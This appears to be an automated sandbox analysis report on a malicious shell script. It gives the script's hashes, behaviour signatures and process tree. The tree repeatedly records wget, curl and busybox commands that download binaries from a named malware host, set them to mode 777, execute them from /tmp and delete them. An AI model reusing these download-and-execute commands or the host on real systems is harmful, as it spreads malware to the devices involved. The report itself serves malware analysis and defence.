Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:44
Static task
static1
Behavioral task
behavioral1
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
-
Size
10KB
-
MD5
38c016b5fafe4cb231ee103b3d469c38
-
SHA1
11bf75788a74d2c7bf1a077fb4baedebb0fbf051
-
SHA256
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
-
SHA512
bb6b857e72ce4063f5fb64cfe1b4950071040ba0b7ae6c3bbab6db49173f1bf43357fefdcd09c87d5c69920a5366e780036c41f4d1bf597042bb693386d5e86a
-
SSDEEP
192:C2i/8cZEED6O20nMNso9OuNSWso9Ou32i/8cLEED6Ol:C2i/8cZEED6O20nMNso9OuNSWso9Ou3Z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 766 chmod 818 chmod 835 chmod 858 chmod 904 chmod 932 chmod 960 chmod 967 chmod 974 chmod 981 chmod 735 chmod 742 chmod 811 chmod 869 chmod 876 chmod 911 chmod 918 chmod 953 chmod 727 chmod 883 chmod 791 chmod 890 chmod 897 chmod 925 chmod 939 chmod 946 chmod -
Executes dropped EXE 26 IoCs
ioc pid Process /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 728 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 736 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 743 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 768 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 792 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 812 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 819 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 837 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 860 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 870 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 877 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 884 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 891 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 898 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 905 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 912 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 919 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 926 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 933 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 940 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 947 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 954 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 961 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 968 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 975 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 982 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 803 curl 873 curl 910 busybox 734 busybox 739 curl 896 busybox 815 curl 882 busybox 797 wget 889 busybox 942 wget 973 busybox 977 wget 732 curl 746 wget 868 busybox 879 wget 900 wget 971 curl 738 wget 864 wget 907 wget 956 wget 970 wget 822 curl 847 curl 938 busybox 705 wget 855 busybox 935 wget 949 wget 963 wget 978 curl 741 busybox 752 curl 886 wget 929 curl 945 busybox 875 busybox 893 wget 922 curl 936 curl 952 busybox 957 curl 980 busybox 832 busybox 866 curl 901 curl 914 wget 821 wget 872 wget 903 busybox 928 wget 931 busybox 966 busybox 763 busybox 809 busybox 985 curl 842 wget 894 curl 924 busybox 943 curl 959 busybox 964 curl -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl
Processes
-
/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:700
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:705
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:725
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:728
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:730
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:731
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:763
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:770
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:772
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:786
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- System Network Configuration Discovery
PID:797
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:813
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:814
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:817
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:820
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:821
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:832
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:863
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:864
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:917
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:933
-
-
